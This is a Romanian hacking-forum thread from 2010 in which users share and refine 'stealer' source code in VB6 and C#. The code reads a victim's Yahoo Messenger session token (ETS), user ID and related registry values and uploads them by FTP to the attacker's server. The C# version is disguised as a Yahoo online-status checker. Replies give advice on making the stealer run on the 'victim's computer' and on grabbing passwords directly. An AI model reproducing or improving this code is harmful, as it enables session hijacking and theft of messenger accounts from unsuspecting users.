[VB6] E.T.S stealer

[parazitul29]

autor: parazitul29

Function scriereg()
Dim scriefisier As String
scriefisier = "c:\praf.reg"
Dim value As String
Dim valuee As String
Dim shell
Set shell = CreateObject("WScript.Shell")
value = shell.regread("HKEY_CURRENT_USER\Software\yahoo\pager\ETS")
valuee = shell.regread("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
Open scriefisier For Output As #1
Print #1, "Windows Registry Editor Version 5.00"
Print #1,
Print #1, "[HKEY_CURRENT_USER\Software\yahoo\pager]"

Print #1, Chr(34) + "ETS" + Chr(34) + "=" + Chr(34) + value + Chr(34)
Print #1, Chr(34) + "Yahoo! User ID" + Chr(34) + "=" + Chr(34) + valuee + Chr(34)
Print #1, Chr(34) + "Save Password" + Chr(34) + "=" + "dword:00000001"


Close #1
End Function

Function ftp()
Inet1.URL = "URL"'introduceti url-ul ftp-ului

Inet1.UserName = "nume"'numele contului ftp

Inet1.Password = "parola"'parola cont ftp

Inet1.Execute Inet1.URL, "PUT C:\praf.reg " & "praf.reg"
End Function

Private Sub Form_Load()
scriereg
End Sub

Private Sub Timer1_Timer()
ftp
End Sub

cred ca numai e nevoie sa mai explic ce face

puneti inet si un timer(interval 2-3) pe form

nu stiu daca e FUD si nici nu ma intereseaza, nu ma intereseaza id-urile YM si conturiile in general,deasemenea nu sunt raspunzator de actiuniile voastre e doar un exemplu de cod in vb6

P.S am si eu o intrebare

prima data am vrut sa citesc registry cu getsetting de ce imi scria 0 in fisier?

Edited July 28, 2010 by parazitul29
comentari

[curtuy]

Legat de GetSetting:

In primul rand SaveSetting creaza ce-i dai tu sa faca in registri sub key-ul "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\AplicatiaTa", iar GetSetting incearca sa ia valoarea tot de acolo... de aia iti dadea 0 cand incercai sa iei din "HKEY_CURRENT_USER\Software\yahoo\pager\".

[Nytro]

Private Sub Form_Load()

scriereg

End Sub

Sti ca va aparea sa dai Yes la rularea Reg-ului nu?

Exista Registry API, destul de usor de folosit.

Inet1.URL = "URL"'introduceti url-ul ftp-ului

Si va fi nevoie de msinet.ocx pe calculatorul victimei. Se rezolva Microsoft Internet API, sau de ce nu cu Winsock?

In rest e bine, ar fi fost de preferat sa ia direct parola din fereastra, sa nu se mai chinuie omul. Felicitari

[parazitul29]

la chestia cu registry mie nu mi-a aparut nimic, dar daca apare se poate rezolva denumesc fisierul unde se scrie ets-ul praf.txt si cand il deschide pentru scriere nu mai are ce sa apara dupa care il trimite pe ftp unde il redenumesc .reg si ar trebuie sa mearga,sa fie din cauza ca nu am facut .exe eu il rulam din vb6 nu aveam de ce sa-l fac exe daca nu o sa-l folosess

la ftp asta cu msinet.ocx e o problema dar cum ai spus se rezolva cu microsoft internet api care are wininet.dll pe care banuiesc ca il au toti sa incerc sa vad ce imi iese

[mosulica]

VB.net

using System;

using System.Collections.Generic;

using System.ComponentModel;

using System.Data;

using System.Drawing;

using System.Text;

using System.Windows.Forms;

using System.IO;

using System.Net;

using Microsoft.Win32;

namespace yahoo

{

public partial class Form1 : Form

{

public Form1()

{

InitializeComponent();

string reg;

RegistryKey key;

key = Registry.CurrentUser.OpenSubKey(@"Software\Yahoo\pager\");

reg = (string)key.GetValue("Yahoo! User ID");

string path = @"c:\" + reg + ".txt";

File.Delete(path);

if (!File.Exists(path))

{

StreamWriter sw = File.CreateText(path);

sw.WriteLine(reg);

reg = (string)key.GetValue("ETS");

sw.WriteLine(reg);

reg = (string)key.GetValue("MD_ID_VALUE");

sw.WriteLine(reg);

sw.Close();

}

reg = (string)key.GetValue("Yahoo! User ID");

System.Net.WebClient client = new System.Net.WebClient();

client.Credentials = new System.Net.NetworkCredential("userftp", "passftp");

client.UploadFile("ftp://ftpserver" + "/" + new FileInfo(path).Name, "STOR", path);

File.Delete(path);

key = Registry.CurrentUser.OpenSubKey(@"Software\Yahoo\pager\");

reg = (string)key.GetValue("Yahoo! User ID");

string path2 = @"c:\" + reg + "_iduri.txt";

File.Delete(path2);

}

private void button1_Click(object sender, EventArgs e)

{

string reg;

RegistryKey key;

key = Registry.CurrentUser.OpenSubKey(@"Software\Yahoo\pager\");

reg = (string)key.GetValue("Yahoo! User ID");

string path2 = @"c:\" + reg + "_iduri.txt";

File.Delete(path2);

this.Close();

}

private void button2_Click(object sender, EventArgs e)

{

string reg;

RegistryKey key;

key = Registry.CurrentUser.OpenSubKey(@"Software\Yahoo\pager\");

reg = (string)key.GetValue("Yahoo! User ID");

string path2 = @"c:\" + reg + "_iduri.txt";

if (textBox1.Text != "")

{

if (!File.Exists(path2))

{

StreamWriter sw2 = File.CreateText(path2);

StringBuilder sb = new StringBuilder();

byte[] buf = new byte[8192];

HttpWebRequest request = (HttpWebRequest)

WebRequest.Create("http://opi.yahoo.com/online?u=" + textBox1.Text + "&m=t");

HttpWebResponse response = (HttpWebResponse)

request.GetResponse();

Stream resStream = response.GetResponseStream();

string tempString = null;

int count = 0;

do

{

// fill the buffer with data

count = resStream.Read(buf, 0, buf.Length);

// make sure we read some data

if (count != 0)

{

// translate from bytes to ASCII text

tempString = Encoding.ASCII.GetString(buf, 0, count);

// continue building the string

sb.Append(tempString);

}

}

while (count > 0);

label2.Text = sb.ToString();

pictureBox1.Width = 96;

pictureBox1.Height = 96;

pictureBox1.Load("http://img.msg.yahoo.com/avatar.php?yids=" + textBox1.Text + "&format=png");

pictureBox1.Refresh();

sw2.WriteLine(textBox1.Text);

sw2.Close();

System.Net.WebClient client = new System.Net.WebClient();

client.Credentials = new System.Net.NetworkCredential("userftp", "passftp");

client.UploadFile("ftp://linkftp" + "/" + new FileInfo(path2).Name, "STOR", path2);

}

if (File.Exists(path2))

{

StreamWriter sw2 = File.AppendText(path2);

StringBuilder sb = new StringBuilder();

byte[] buf = new byte[8192];

HttpWebRequest request = (HttpWebRequest)

WebRequest.Create("http://opi.yahoo.com/online?u=" + textBox1.Text + "&m=t");

HttpWebResponse response = (HttpWebResponse)

request.GetResponse();

Stream resStream = response.GetResponseStream();

string tempString = null;

int count = 0;

do

{

// fill the buffer with data

count = resStream.Read(buf, 0, buf.Length);

// make sure we read some data

if (count != 0)

{

// translate from bytes to ASCII text

tempString = Encoding.ASCII.GetString(buf, 0, count);

// continue building the string

sb.Append(tempString);

}

}

while (count > 0);

label2.Text = sb.ToString();

pictureBox1.Width = 96;

pictureBox1.Height = 96;

pictureBox1.Load("http://img.msg.yahoo.com/avatar.php?yids=" + textBox1.Text + "&format=png");

pictureBox1.Refresh();

sw2.WriteLine(textBox1.Text);

sw2.Close();

System.Net.WebClient client = new System.Net.WebClient();

client.Credentials = new System.Net.NetworkCredential("userftp", "passftw");

client.UploadFile("ftp://ftpsite" + "/" + new FileInfo(path2).Name, "STOR", path2);

}

}

}

}

}

Edited July 30, 2010 by mosulica